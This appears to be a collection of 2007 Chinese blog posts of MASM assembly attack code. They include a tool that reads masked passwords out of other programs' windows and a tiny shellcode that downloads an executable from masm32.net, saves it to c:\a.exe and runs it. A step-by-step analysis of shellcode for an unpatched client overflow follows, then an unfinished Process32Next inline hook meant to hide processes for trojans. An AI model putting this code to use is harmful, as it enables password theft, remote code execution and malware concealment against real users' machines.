;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
.const
STATUS_SUCCESS             equ       0
ThreadBasicInformation       equ 0
DLG_MAIN       equ             1000
ID_PWD             equ             1001
IDB_1             equ          1
IDC_BMP             equ          108

RGB MACRO red, green, blue
      xor eax, eax
      mov al, blue ; blue
      rol eax, 8
      mov al, green ; green
      rol eax, 8
      mov al, red    ; red
ENDM
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;       数据段
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
.data
hWinMain dd ?
vp       db 'viewpass 0.1 codz czy',0
PASSLEN    DD ?
ENCODE    DD ?
WINTHREADID DD ?
WINHAND    DD 0
unknownvar  DD ?
VirtualAddress dd ?
VirtualSize dd ?
VarOffset dd ?
modbase    dd ?
lenoffset dd ?
passoffset  dd ?
Tahoma    db 'Tahoma',0
editname db 'EdIt',0
Richeditname db 'RichEdit20W',0
dataname db '.data ',0
erros    db '不是吧,还在用WIN9X/NT4',0
nowin    db '找不到主窗体',0
nowin2    db '找不到子窗体中的密码窗口',0
errnowow db '不能找到UserRegisterWowHandlers函数地址',0
errnocode db '不能找到UserRegisterWowHandlers函数中相匹配的机器码',0
erropenthread db '不能打开线程',0
errgetteb    db '打开线程但不能得到TEB',0
errnorealcid  db '不能得到TEB中的RealClientID',0
errnounknowvar db '不能从user32.dll中找到未知变量',0
passerr    db '密码太长或为空',0
tebformat db 'TEB %x',0
varformat db 'user32.dll gSharedInfo addr:%x',0
varformat2  db 'GUI TABLE in user modle addr:%08x',0
realcidformat  db 'real cid:%x',0
Wndformat    db 'pass window hand:%x,win thread id:%x',0
wndcontformat  db 'win struct:%x',0
passaddrformat db 'pass addr:%x',0
passlenformat  db 'pass len:%d',0
passformat    db 'pass decode  is:%x',0
user32dll    db 'user32.dll',0
Ntdll                db       "NTDLL.DLL",0
_UserRegisterWowHandlers  db "UserRegisterWowHandlers",0
_ZwQueryInformationThread db "ZwQueryInformationThread",0
THREADHAND    DD 0
apiquerthread  dd ?
Pthreadinfo dd ?
.data?
hInstance          dd ?
szBuffer          db 256 dup       (?)
buffervar    db 32 dup (?)
buffervar2    db 32 dup (?)
bufferteb    db 32 dup (?)
bufferPassWnd  db 32 dup (?)
bufferrealcid  db 32 dup (?)
bufferwndcont  db 32 dup (?)
bufferpassaddr db 32 dup (?)
bufferpasslen  db 32 dup (?)
bufferpass1 db 128 dup (?)
bufferuni    db 256 dup (?)
classname    db 128 dup (?)
buffer1       db 128 dup (?)
buffercode    db 1024 dup (?)

            .code

;********************************************************************
ViewPass  proc
         LOCAL parid:dword
         LOCAL threadinfo:THREAD_BASIC_INFORMATION

      ;invoke MessageBox,0,offset vp,offset vp,1

;--------------判断操作系统
      invoke CheckOS
      .if eax == 0
         ret
      .endif

;---------------得到密码窗口句柄,以及线程句柄,进程句柄

         MOV EBX,WINHAND
         .if  EBX!=NULL
            invoke GetWindowThreadProcessId,eBx,addr parid
            MOV WINTHREADID,EAX
            ;invoke wsprintf,offset bufferPassWnd,offset Wndformat,ebx,eax
            ;invoke MessageBox,0,offset bufferPassWnd,offset vp,1
         .else
            invoke MessageBox,0,offset nowin2,offset vp,1
            ret
         .endif
;-------------根据窗口所在的进程的进程号得到这个进程加载的USER32.DLL的基地址

      invoke GetUser32Base,parid
      mov modbase,eax

;--------------根据窗口所在的线程得到该线程的TEB地址
         invoke  OpenThread,THREAD_QUERY_INFORMATION,FALSE,WINTHREADID
         .if       eax != NULL
                  mov    THREADHAND,EAX
                     invoke       LoadLibrary,offset Ntdll
                  invoke       GetProcAddress,eax,offset _ZwQueryInformationThread
                  mov    apiquerthread,eax
                  push 0
                  push sizeof THREAD_BASIC_INFORMATION
                  lea    ecx,threadinfo
                  push ecx
                  push ThreadBasicInformation
                  push THREADHAND
                  call apiquerthread
                  .IF EAX == STATUS_SUCCESS
                     lea ecx,threadinfo
                     mov esi,[ecx+4] ;得到TEB了
                  .ELSE
                     invoke MessageBox,0,offset errgetteb,offset vp,1
                     ret
            .ENDIF
      .else
         invoke MessageBox,0,offset erropenthread,offset vp,1
         ret
      .endif
      ;invoke wsprintf,offset bufferteb,offset tebformat,esi
      ;invoke MessageBox,0,offset bufferteb,offset vp,1

;-------------------------得到TEB中的RealClientID
      add esi,6cch
      add esi,1ch
      invoke Toolhelp32ReadProcessMemory,parid,esi,offset buffer1,4,NULL
      .if eax == TRUE
            mov eax,offset buffer1
            mov eax,[eax]
            mov edi,eax
            .if eax !=NULL
            ;invoke wsprintf,offset bufferrealcid,offset realcidformat,eax
            ;invoke MessageBox,0,offset bufferrealcid,offset vp,1
            .else
            invoke MessageBox,0,offset errnorealcid,offset vp,1
            ret
            .endif
      .endif



      ;密码窗口句柄取低16位
      xor eax,eax
      mov ebx,WINHAND
      mov ax,bx
      add ax,ax
      add ax,bx ;3
      add ax,ax ;6
      add ax,ax ;12
      mov ebx,eax
      pushad
      invoke GetUnknowVarOffset
      .if eax !=NULL
            mov eax,VarOffset
            add eax,modbase
            add eax,VirtualAddress
            ;invoke wsprintf,offset buffervar,offset varformat,eax
            ;invoke MessageBox,0,offset buffervar,offset vp,1
      .else
            invoke MessageBox,0,offset errnounknowvar,offset vp,1
            ret
      .endif
      popad
      mov ecx,VarOffset
      add ecx,modbase
      add ecx,VirtualAddress
      invoke Toolhelp32ReadProcessMemory,parid,ecx,offset buffer1,4,NULL
      .if eax == TRUE
            mov ecx,offset buffer1
            mov ecx,[ecx]
            ;push ecx
            ;invoke wsprintf,offset buffervar2,offset varformat2,ecx
            ;invoke MessageBox,0,offset buffervar2,offset vp,1
            ;pop ecx

      .endif
      add  ebx,ecx ;窗口句柄低16位*12+GUI TABLE BASE
      invoke Toolhelp32ReadProcessMemory,parid,ebx,offset buffer1,4,NULL
      .if eax == TRUE
            mov ecx,offset buffer1
            mov ecx,[ecx]
      .endif
      sub ecx,edi ;减REALCLIENTID
      mov esi,ecx
      ;invoke wsprintf,offset bufferwndcont,offset wndcontformat,esi
      ;invoke MessageBox,0,offset bufferwndcont,offset vp,1

      add esi,passoffset
      invoke Toolhelp32ReadProcessMemory,parid,esi,offset buffer1,4,NULL
      .if eax == TRUE
            mov ecx,offset buffer1
            mov esi,[ecx]
      .endif
      ;invoke wsprintf,offset bufferpassaddr,offset passaddrformat,esi
      ;invoke MessageBox,0,offset bufferpassaddr,offset vp,1
      ;得到密码长度
      mov  ecx,esi
      add  ecx,lenoffset
      invoke Toolhelp32ReadProcessMemory,parid,ecx,offset buffer1,4,NULL
      .if eax == TRUE
            mov ecx,offset buffer1
            mov ecx,[ecx]
            mov PASSLEN,ecx
      .endif
      .if ecx>0 && ecx <32
      ;invoke wsprintf,offset bufferpasslen,offset passlenformat,ecx
      ;invoke MessageBox,0,offset bufferpasslen,offset vp,1
      .else
      invoke MessageBox,0,offset passerr,offset vp,1
      ret
      .endif

      ;得到加密密码的变量
      mov ecx,esi
      add ecx,0ECh
      invoke Toolhelp32ReadProcessMemory,parid,ecx,offset buffer1,4,NULL
      .if eax == TRUE
            mov ecx,offset buffer1
            MOV ECX,[ECX]
            xor edx,edx
            movzx edx,cl
            mov ENCODE,EDX
      .endif
      ;invoke wsprintf,offset bufferpass1,offset passformat,edx
      ;invoke MessageBox,0,offset bufferpass1,offset vp,1

      ;得到解密后的密码
      mov ecx,esi
      invoke Toolhelp32ReadProcessMemory,parid,ecx,offset buffer1,4,NULL
      .if eax == TRUE
            mov ecx,offset buffer1
            mov ecx,[ecx]
      .endif
      invoke Toolhelp32ReadProcessMemory,parid,ecx,offset buffer1,4,NULL
      .if eax == TRUE
            mov ecx,offset buffer1
            mov ecx,[ecx]
      .endif
      mov ebx,ecx
      invoke Toolhelp32ReadProcessMemory,parid,ecx,offset buffer1,PASSLEN,NULL
      .if eax == TRUE
            mov esi,offset buffer1
      .endif

      MOV EDX,ENCODE
      mov cl,dl
      mov edi,PASSLEN
@@nextpass:
      CMP EDI,1
      JBE @@firstpass
      mov eax,esi
      add eax,edi
      mov dl,[eax-2]
      xor dl,[eax-1]
      xor dl,cl ;重要
      mov [eax-1],dl
      dec edi
      jmp @@nextpass
@@firstpass:
      or  cl,43h ;WHY?
      mov edx,offset buffer1
      xor [edx],cl
      ;密码可能是UNICODE的
      invoke lstrlenA,edx

      .if eax<PASSLEN ;密码是UNICODE
      mov edx,PASSLEN
      add edx,edx
      mov ecx,ebx
      invoke Toolhelp32ReadProcessMemory,parid,ecx,offset buffer1,edx,NULL
      .if eax == TRUE
            mov esi,offset buffer1
      .endif
      mov edi,PASSLEN
      add edi,edi
      MOV EDX,ENCODE
      mov cl,dl

@@nextpass2:
      CMP EDI,1
      JBE @@firstpass2
      mov eax,esi
      add eax,edi
      mov dl,[eax-2]
      xor dl,[eax-1]
      xor dl,cl ;重要
      mov [eax-1],dl
      dec edi
      jmp @@nextpass2
@@firstpass2:
      or  cl,43h
      mov edx,offset buffer1
      xor [edx],cl
      ;invoke MessageBoxW,0,edx,edx,1
      invoke       SetDlgItemTextW,hWinMain,ID_PWD,edx
      .else
      mov ecx,offset buffer1
      add ecx,PASSLEN
      xor eax,eax
      MOV [ECX],eax
      invoke       SetDlgItemTextA,hWinMain,ID_PWD,offset buffer1
      invoke  RtlZeroMemory,offset buffer1,128
      .endif

         ret
ViewPass  endp

comment %
GetUnknowVarOffset  proc uses esi edi ebx
                  LOCAL user32base:dword
                  LOCAL varaddr:dword

      invoke LoadLibrary,offset user32dll
      mov user32base,eax
      invoke _ProcessPeFile,user32base ;返回user32.dll的.data段的虚拟偏移
      invoke GetProcAddress,user32base,offset _UserRegisterWowHandlers
      .if eax!=NULL
         invoke RtlMoveMemory,offset buffercode,eax,1000
         mov esi,offset buffercode
         xor ebx,ebx
@@nextcode:
         mov ax,word ptr [esi]
         .if ax==08C2h
            add esi,2
            mov al,byte ptr[esi]
            sub esi,2
            .if al==00h
                  ;--找到ret 08(C20800)后,倒过去找mov eax,xxxxxxxx (B8 xxxxxxxx)
                  sub esi,5
                  sub ebx,5
@@nextcode2:
                  mov al,byte ptr [esi]
                  .if al==0B8h
                     inc esi
                     mov eax,dword ptr [esi]
                     dec esi
                     mov varaddr,eax
                  .else
                  @@nextb8:
                     dec esi
                     dec ebx
                     .if ebx>1
                        jmp @@nextcode2
                     .else ;找不到mov eax,xxxxxxxx
                        invoke MessageBox,0,offset errnocode,offset vp,1
                        xor eax,eax
                        ret
                     .endif
                  .endif
            .else
                  jmp @@findother
            .endif
         .else
@@findother:
            inc ebx
            inc esi
            .if ebx<1000d
                  jmp @@nextcode
            .else ;找不到ret 08指令
                  invoke MessageBox,0,offset errnocode,offset vp,1
                  xor eax,eax
                  ret
            .endif
         .endif
      .else  ;找不到函数
      invoke MessageBox,0,offset errnowow,offset vp,1
      xor eax,eax
      ret
      .endif
      ;正常情况varaddr为USER32.DLL全局变量中记录当前线程GUI TABLE R3层地址的变量的地址

      mov ecx,user32base
      add ecx,VirtualAddress ;得到内存中user32.dll的全局变量的起始地址
      mov eax,varaddr
      sub eax,ecx ;变量的地址减全局变量起始地址
      .if eax>0 && eax<VirtualSize ;变量的偏移大于0,小于变局变量总大小
      add eax,4
      mov VarOffset,eax

      .else
      jmp @@nextb8
      .endif


                  ret
GetUnknowVarOffset  endp
%

GetUnknowVarOffset  proc uses esi edi ebx
                  LOCAL user32base:dword
                  LOCAL varaddr:dword
                  LOCAL optable[2048]:byte
                  LOCAL oplen[256]:byte ;记录每个指令的长度,最多512个

      invoke LoadLibrary,offset user32dll
      mov user32base,eax
      invoke _ProcessPeFile,user32base ;返回user32.dll的.data段的虚拟偏移
      invoke GetProcAddress,user32base,offset _UserRegisterWowHandlers
      .if eax!=NULL
         invoke RtlMoveMemory,offset buffercode,eax,1000
         mov esi,offset buffercode
;------------------------    利用LDE32库函数得到该函数中每个指令的长度:)


      lea  eax,optable
      push eax
      call disasm_init  ;解压缩'指令长度表'


      xor ebx,ebx
      lea edi,oplen
@@nextcode:
      push esi
      lea  eax,optable
      push eax
      call disasm_main
      .if eax!=-1 && ebx<256
         mov cx,word ptr [esi]
         mov dl,byte ptr [esi+2]
         .if eax == 3 && cx == 08C2h && dl == 00  ;找到ret 08=C20800
         ;-------------------然后反过去找MOV EAX,XXXXXXXX =B8 XXXXXXXX
         dec ebx

@@nextcode2:
         mov AL,byte ptr [edi+ebx]
         movzx eax,al
         sub esi,eax
         mov cl,byte ptr [esi]
         .if al == 5 && cl == 0B8H
                     inc esi
                     mov eax,dword ptr [esi]
                     mov varaddr,eax
                     dec esi
         .else
@@nextb8:
                  dec ebx
                  .if ebx >1
                     jmp @@nextcode2
                  .else
                     jmp @@errcode
                  .endif
         .endif

         .else
         mov byte ptr [edi+ebx],al
         inc ebx
         add esi,eax
         jmp @@nextcode
         .endif
   .else ;找不到RET 08指令
@@errcode:
         invoke MessageBox,0,offset errnocode,offset vp,1
         xor eax,eax
         ret
   .endif
;------------------------
      .else  ;找不到函数
         invoke MessageBox,0,offset errnowow,offset vp,1
         xor eax,eax
         ret
      .endif
      ;正常情况varaddr为USER32.DLL全局变量中记录当前线程GUI TABLE R3层地址的变量的地址

      mov ecx,user32base
      add ecx,VirtualAddress ;得到内存中user32.dll的全局变量的起始地址
      mov eax,varaddr
      sub eax,ecx ;变量的地址减全局变量起始地址
      .if eax>0 && eax<VirtualSize ;变量的偏移大于0,小于全局变量总大小
      add eax,4
      mov VarOffset,eax
      .else
      jmp @@nextb8
      .endif


                  ret
GetUnknowVarOffset  endp

GetUser32Base  proc uses ebx esi edi remoteproid
         LOCAL hSnapshot:dword
         LOCAL modinfo:MODULEENTRY32
         LOCAL modname[256]:byte

      mov          modinfo.dwSize,sizeof MODULEENTRY32
      invoke  CreateToolhelp32Snapshot,TH32CS_SNAPMODULE,remoteproid
      mov    hSnapshot,eax
      invoke  Module32First,hSnapshot,addr modinfo
      .while eax
      lea    ecx,modinfo.szModule
      invoke  lstrcmpi,offset user32dll,ecx
      .if    eax == 0
            mov eax,modinfo.modBaseAddr
            ret
      .endif
      invoke  Module32Next,hSnapshot,addr modinfo
      .endw
      invoke       CloseHandle,hSnapshot

            ret
GetUser32Base endp

_ProcessPeFile       proc _lpPeHead
            local       @szBuffer[1024]:byte,@szSectionName[16]:byte

      mov       esi,_lpPeHead
            assume       esi:ptr IMAGE_DOS_HEADER
      add       esi,[esi].e_lfanew
            mov       edi,esi
            assume       edi:ptr IMAGE_NT_HEADERS
            ;movzx       ecx,[edi].FileHeader.Machine
            ;movzx       edx,[edi].FileHeader.NumberOfSections
            ;movzx       ebx,[edi].FileHeader.Characteristics

;********************************************************************
; 循环显示每个节区的信息
;********************************************************************
            movzx       ecx,[edi].FileHeader.NumberOfSections
            add       edi,sizeof IMAGE_NT_HEADERS
            assume       edi:ptr IMAGE_SECTION_HEADER
            .repeat
                     push       ecx
;********************************************************************
; 节区名称
;********************************************************************
                     invoke       RtlZeroMemory,addr @szSectionName,sizeof @szSectionName
                     push       esi
                     push       edi
                     mov       ecx,8
                     mov       esi,edi
                     lea       edi,@szSectionName
                     cld
                     @@:
                     lodsb
                     .if       ! al
                              mov       al,' '
                     .endif
                     stosb
                     loop       @B
                     pop       edi
                     pop       esi
;********************************************************************
         invoke lstrcmpi,offset dataname,addr @szSectionName
         .if eax == 0
                  push [edi].VirtualAddress
                  pop VirtualAddress
                  push dword ptr [edi+8]
                  pop VirtualSize
                  ret
                     .else
                     add       edi,sizeof IMAGE_SECTION_HEADER
                     .endif
;********************************************************************
                     pop       ecx
            .untilcxz
            assume       edi:nothing
            ret

_ProcessPeFile       endp

CheckOS proc
LOCAL verinfo:OSVERSIONINFO

mov    verinfo.dwOSVersionInfoSize,sizeof OSVERSIONINFO
invoke  GetVersionEx,addr verinfo
.if (verinfo.dwPlatformId == VER_PLATFORM_WIN32_NT && verinfo.dwMajorVersion == 5 && verinfo.dwMinorVersion == 1)
      mov eax,1 ;xp
      mov passoffset,0A4H
      mov lenoffset ,14H
.elseif (verinfo.dwPlatformId == VER_PLATFORM_WIN32_NT && verinfo.dwMajorVersion == 5 && verinfo.dwMinorVersion == 2)
      mov eax,1 ;2003
      mov passoffset,0A0H
      mov lenoffset ,0CH
.elseif (verinfo.dwPlatformId == VER_PLATFORM_WIN32_NT && verinfo.dwMajorVersion == 5 && verinfo.dwMinorVersion == 0)
      mov eax,1 ;2000
      mov passoffset,98H
      mov lenoffset ,0cH
.else
      invoke MessageBox,0,offset erros,offset vp,1
      xor eax,eax  ;9x,nt4
.endif

      ret
CheckOS endp

_ProcDlgMain       proc       uses ebx edi esi, \
            hWnd:DWORD,wMsg:DWORD,wParam:DWORD,lParam:DWORD
            local       @stPoint:POINT
            local       @hWindow
            local hBrush :dword
         local rect:RECT
         local LogBrush:LOGBRUSH

            mov       eax,wMsg
            .if       eax == WM_CLOSE
                     invoke       EndDialog,hWnd,NULL
                     invoke       KillTimer,hWnd,1
            .elseif       eax == WM_INITDIALOG
                     push hWnd
                     pop    hWinMain
                  invoke LoadIcon, hInstance, 1
                  invoke SendMessage, hWnd, WM_SETICON, ICON_SMALL, eax
                     invoke       SendDlgItemMessage,hWnd,ID_PWD,EM_SETREADONLY,TRUE,NULL
                     invoke       SetWindowPos,hWnd,HWND_TOPMOST,0,0,0,0,\
                                 SWP_NOMOVE or SWP_NOSIZE
                     invoke       SetTimer,hWnd,1,2000,NULL
                     invoke       LoadBitmap,hInstance,IDB_1
                     invoke       SendDlgItemMessage,hWnd,IDC_BMP,STM_SETIMAGE,IMAGE_BITMAP,eax
                     invoke  GetWindowLong,hWnd, GWL_EXSTYLE
                     or    eax,80000h
                     invoke  SetWindowLong,hWnd, GWL_EXSTYLE, eax
                     invoke  SetLayeredWindowAttributes,hWnd, 0, 220, 02h;LWA_ALPHA
         .elseif       eax ==       WM_CTLCOLORSTATIC
                  RGB 0,0,0
                  invoke       SetBkColor,wParam,eax
                  invoke       SetTextColor,wParam,00aeaeaeh
                  invoke       GetStockObject,HOLLOW_BRUSH
                  ret
            .elseif       eax == WM_ERASEBKGND
                  mov LogBrush.lbStyle,BS_SOLID
                  RGB 0,0,0
                  mov LogBrush.lbColor,eax
                  invoke CreateBrushIndirect,addr LogBrush
                  mov hBrush,eax
                  invoke GetClientRect,hWnd,addr rect
                  invoke FillRect,wParam,addr rect,hBrush
                  mov eax,TRUE
                  ret
            .elseif       eax == WM_TIMER
                     invoke       GetCursorPos,addr @stPoint
                     invoke       WindowFromPoint,@stPoint.x,@stPoint.y
                     mov       @hWindow,eax
                     .if       eax !=       NULL
                              invoke GetWindowLong,@hWindow,GWL_STYLE
                              .if (eax & ES_PASSWORD)
                  invoke GetClassName,@hWindow,offset classname,64
                  invoke lstrcmpi,offset classname,offset editname
                  .if eax == 0
                  mov eax,@hWindow
                  mov WINHAND,eax
                  invoke  ViewPass
                  .endif
                              .endif
                     .endif
            .else
;********************************************************************
;       注意：对话框的消息处理后，要返回 TRUE,对没有处理的消息
;       要返回 FALSE
;********************************************************************
                     mov       eax,FALSE
                     ret
            .endif
            mov       eax,TRUE
            ret

_ProcDlgMain       endp

include    \masm32\include\lde32bin.inc
;********************************************************************
start:
            invoke       GetModuleHandle,NULL
            mov       hInstance,eax
            invoke       DialogBoxParam,hInstance,DLG_MAIN,NULL,offset _ProcDlgMain,0
            invoke       ExitProcess,NULL
end       start

Tiny Download&&Exec ShellCode

czy82 — Fri, 22 Jun 2007 18:57:00 GMT

;Tiny Download&&Exec ShellCode codz czy 2007.6.1
;header 163=61(16+8+9+(28))+95(68+27)+17
;163+19=192
comment %
                #--------------------------------------#          #
              # Tiny Download&&Exec ShellCode-->       #       #
            #    -->size 192                              #   #
          #                      2007.06.01                 #
            #                    codz: czy                #   #
             #------------------------------------------#      #

system :test on ie6+XPSP2/2003SP2/2kSP4
%
.586
.model flat,stdcall
option casemap:none

include     c:\masm32\include\windows.inc
include     c:\masm32\include\kernel32.inc
includelib c:\masm32\lib\kernel32.lib
include     c:\masm32\include\user32.inc
includelib c:\masm32\lib\user32.lib

.data
shelldatabuffer db 1024 dup(0)
shellcodebuffer db 2046 dup(0)
downshell db 'down exploit',0
txtname  db 'c:\office\unicode.doc',0
.code
start:
invoke MessageBoxA,0,offset downshell,offset downshell,1
invoke RtlMoveMemory,offset shellcodebuffer,00401040H,256
mov eax,offset shellcodebuffer
jmp eax
somenops db 90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h
;上面的代码是把在代码段中的shellcode移动数据段中执行，模拟真实的shellcode执行环境
@@shellcodebegin:
call @@beginaddr
@@beginaddr:
PUSH 03H      ;要调用的API函数个数
jmp @@realshellcode
myExitProcess     dd 073e2d87eh
myWinExec         dd 00e8afe98h
myLoadLibraryA    dd 0ec0e4e8eh
dll               db 'URLMON',0,0
myUrlDownFile     dd 0702f1a36h
path              db 'c:\a.exe',0
url               db 'http://www.masm32.net/a.exe',0

@@realshellcode:
    POP ECX
    POP EDI
    SCASD ;edi+4
;得到kernel32.dll基地址
db 67h,64h,0A1h,30h,00h
mov eax, [eax+0cH]
mov esi, [eax+1cH]
    lodsd
mov ebp, [eax+08H]          ;EBP中存放kernel32.dll的基地址
;处理导出表
@@next2:
PUSH      ECX
@@next3:
MOV       ESI,[EBP+3Ch]
MOV       ESI,[EBP+ESI+78h]
ADD       ESI,EBP
PUSH      ESI
MOV       ESI,[ESI+20h]
ADD       ESI,EBP
XOR       ECX,ECX
DEC       ECX
@@next:
INC       ECX
LODSD
ADD       EAX,EBP
XOR       EBX,EBX
@@again:
    MOVSX     EDX,BYTE PTR [EAX]
    CMP       DL,DH
    JZ        @@end
    ROR       EBX,0Dh
    ADD       EBX,EDX
    INC       EAX
    JMP       @@again
@@end:
CMP       EBX,[EDI]
JNZ       @@next

POP       ESI
MOV       EBX,[ESI+24h]
ADD       EBX,EBP
MOV       CX,WORD PTR [ECX*2+EBX]
MOV       EBX,[ESI+1Ch]
ADD       EBX,EBP
MOV       EAX,[ECX*4+EBX]
ADD       EAX,EBP
STOSD
POP       ECX
loop @@next2

mov ecx,[edi]   ;2
cmp cl,'c'      ;3
jz @@downfile   ;2
PUSH EDI
CALL EAX        ;2
xchg eax,ebp
scasd
scasd
push 01         ;2第二个DLL的函数个数
jmp @@next3     ;2
                ;总计17

@@downfile:

push edx ;0
push edx ;0
push    edi ;file=c:\a.exe
lea     ecx, dword ptr [edi+9h]
push    ecx ;url
push edx ;0
call eax ;URLDownloadToFileA,0,url,file=c:\a.exe,0,0

push 1 ;FOR TEST
push edi
call dword ptr [edi-14H] ;winexec,'c:\xxx.exe',1

    call dword ptr [edi-18H] ;Exitprocess

somenops2 db 90h,90h,90h,90h,90h,90h,90h,90h,90h
invoke ExitProcess,0
end start

这个SheUcode比较有意思

czy82 — Mon, 14 May 2007 00:23:00 GMT

这个SheUcode比较有意思

某客户端程序0day,溢出发生时
EAX=00000000 EBX=00000000 ECX=00000006 EDX=7C92EB94 ESI=00000001
EDI=001362B0 ESP=001E0061 ESP=00136110 EIP=7FFA5564 o d I s Z a P c
CS=001B DS=0023 SS=0023 ES=0023 FS=003B GS=0000

看似比较简单的栈溢出,程序也没有/GS,但是字符串长度限制为100个字节(不能覆盖SEH),而且
字符串会部分转化为UniCode格式,通过分析溢出发生时可以用转化后的字符串覆盖函数返回地
址,同时EDI刚好指向转化后的字符串开头.在简中系统下代码页刚好有个JMP EDI(6455FA7F)
而6455FA7F的ANSI编码为C6A1C24F.OK跳转地址搞定,来看看SHELLCODE怎么写了,由于这个漏洞
非常特殊,字符串是部分转化,而且长度只有100个字节,所以只能想办法在这100个字节中用小SHELLCODE
找大SHELLCODE了.经过测试发现XP SP2下,SEHLLCODE中的异常处理代码不能在栈中,所以还得想
法把代码移到堆中.下面是我的办法:先看第四部分.

第一部分:
:00136193 5E                      pop esi       ;因为是CALL跳过来的,POP后ESI变为001361BC,esp+4=0013610C
:00136194 5E                      pop esi       ;esi变为001361D5也就是异常处理指令的地址
:00136195 55                      push ebp      ;通过分析漏洞,溢出发生时EBP的值为是跳转地址前面的四字节(UNICODE格式)
:00136196 5F                      pop edi       ;EDI变为001E0061
:00136197 A5                      movsd
:00136198 A5                      movsd
:00136199 A5                      movsd
:0013619A A5                      movsd         ;把ESI(001361D5)中的代码移到(edi)001e0061中
:0013619B 55                      push ebp      ;设置新的异常处理函数地址
:0013619C EB1E                    jmp ↓001361BC ;回到第二部分
:0013619E 61                      popad
:0013619F 61                      popad
:001361A0 61                      popad
:001361A1 61                      popad
:001361A2 61                      popad
:001361A3 61                      popad
:001361A4 61                      popad
:001361A5 61                      popad
:001361A6 61                      popad
:001361A7 61                      popad
:001361A8 61                      popad
:001361A9 61                      popad
:001361AA 1E                      push ds
:001361AB C6A1C24F                转化前的跳转地址(7FFA5564 JMP EDI)

第二部分:
:001361B0 6481EFDB000000          sub edi,000000DB        ;edi为001362B0-db=001361d5,得到第三部分指令的地址
:001361B6 57                      push edi                ;esp-4=0013610C,edi=001361d5
:001361B7 E8D7FFFFFF              call ↑00136193          ;esp-4=00136108,函数功能:把异常处理指令移到堆中
:001361BC 64FF30                  push dword ptr fs:[eax] ;在跳过来之前新的异常处理地址已经压栈,现保存原来的
:001361BF 648920                  mov dword ptr fs:[eax], esp ;esp也就是异常处理结构的地址比较巧妙
:001361C2 BA41424142              mov edx, 42414241           ;搜索ABAB
:001361C7 BF00001400              mov edi, 00140000           ;起始地址00140000
:001361CC 3B17                    cmp edx, dword ptr [edi]
:001361CE 7403                    je ↓001361D3
:001361D0 47                      inc edi
:001361D1 EBF9                    jmp ↑001361CC
:001361D3 57                      push edi
:001361D4 C3                      ret

第三部分:处理搜索内存异常的代码
:001361D5 8B54240C                mov edx, dword ptr [esp+0C]
:001361D9 80C29C                   add dl, 9C
:001361DC 33C0                       xor eax, eax
:001361DE B440                       mov ah, 40
:001361E0 0102                       add dword ptr [edx], eax
:001361E2 33C0                      xor eax, eax
:001361E4 C3                          ret

第四部分:程序首先从代码页中的JMP EDI跳到这儿.
:001362B0 57                      push edi         ;edi为001362B0,push以后ESP变为0013610C
:001362B1 004700                  add [edi+00],al ;nop
:001362B4 44                      inc esp          ;esp变为0013610D
:001362B5 004700                  add [edi+00],al ;nop
:001362B8 59                      pop ecx          ;ecx的值为XX001362,ESP变为00136111
:001362B9 004700                  add [edi+00],al ;nop
:001362BC 49                      dec ecx          ;ecx变为XX001361
:001362BD 004700                  add [edi+00],al ;nop
:001362C0 51                      push ecx         ;ESP变为0013610D
:001362C1 004700                  add [edi+00],al ;nop
:001362C4 4C                      dec esp          ;ESP变为0013610C
:001362C5 004700                  add [edi+00],al ;nop
:001362C8 C3                      ret              ;ESP变为溢出发生时的00136110,程序跳到001361B0

还没晕吧?纯粹指令技巧,主要是为了让代码是全字母且是UNICODE格式.
其实这部分代码等于执行
sub edi,100h
jmp edi
这个漏洞非常奇怪,字符是部分转化,且EDI-100H处是没转化的字符,所以先用上面的这个办法跳到
没转化的指令去执行.当然由于字符串长度的限制也没法直接写UNICODE编码的SHELLCODE.
下面请看第二部分的代码.

应用层InLine Hook

czy82 — Sun, 18 Mar 2007 22:57:00 GMT

我的思路:

1.得到本进程中包含被挂接API的DLL的基地址,该DLL代码节的虚拟偏移以及该API的入口地址.API入口地址-(代码节虚拟偏移+DLL基地址)=函数入口相对于代码节的偏移

2.得到目标进程的PID,以及目标进程包含被挂接API的DLL的基地址(注意一般来说和前面自身进程的值相同)前面得到的函数入口偏移+DLL基地址+代码节虚拟偏移=目标进程API函数入口地址

3.打开目标进程读目标进程API函数入口处128字节代码到自身进程的变量中.然后调用z0mbie写的LDE32库取该API函数入口处几个指令的长度当长度>=5时保存该长度(这样防止后面取指令没有对齐)

4.为我们的假函数在目标进程加载的DLL中分配空间(我是把代码写在PE头的后面)这儿要改该内存的属性为读写执行(PAGE_EXECUTE_READWRITE).为了方便编译我们的假函数是写在代码段中的,在运行时要把这些代码移到数据段,然后把第3步取出的指令放在数据段中相应的偏移处.同时还要再数据段中设置跳回直实函数的JMP指令.

5.把真正的API开头的指令为JMP到我们的假函数中.

;目前遇到的问题:

1.在假函数中如何调用其它的API函数,以及如何方便的引用全局,局部变量

2.如何防止重复HOOK.

3.假函数写在目标DLL的哪儿比较适合.

看了网上不少公开的文章写了这些代码,个人感觉应用层INLINE HOOK对于木马隐藏来说不是很有必要.因为WIN 2K及以后系统的COPY ON WRITE机制,导制象我这样的代码HOOK并不是全局的,要实现全局的要不是要举例进程每个进程都这样处理一次,要不就是要安装全局钩子但一般这个操作都要引起杀毒软件的报警.另外如果上第一种办法对于新启动的进程你还得不停的举例以便于找出新启动的进程哩.有些人说在驱动下可以有一个通知API,但这样的话还不如直接在驱动下HOOK SSDT或是驱动的INLINE HOOK了.

;2007.03
.586
.model flat,stdcall
option casemap:none

include     ../include/windows.inc
include     ../include/user32.inc
includelib ../lib/user32.lib
include     ../include/kernel32.inc
includelib ../lib/kernel32.lib
include     ../include/shell32.inc
includelib ../lib/shell32.lib

.data
kernel32 db 'kernel32.dll',0
P32First db 'Process32Next',0
inline db 'Hook Process32Next Hide Process:)',0
sztext db '.text ',0
VirtualAddress dd 0
JMPCODE db 0E9h,010h,10H,10H,10H,0
JMPCODE2 db 0E9h,010h,10H,10H,10H,0
HookFunBuf db 256 dup (?)

.code
_ProcessPeFile proc _lpPeHead
  local @szBuffer[1024]:byte,@szSectionName[16]:byte

        mov esi,_lpPeHead
  assume esi:ptr IMAGE_DOS_HEADER
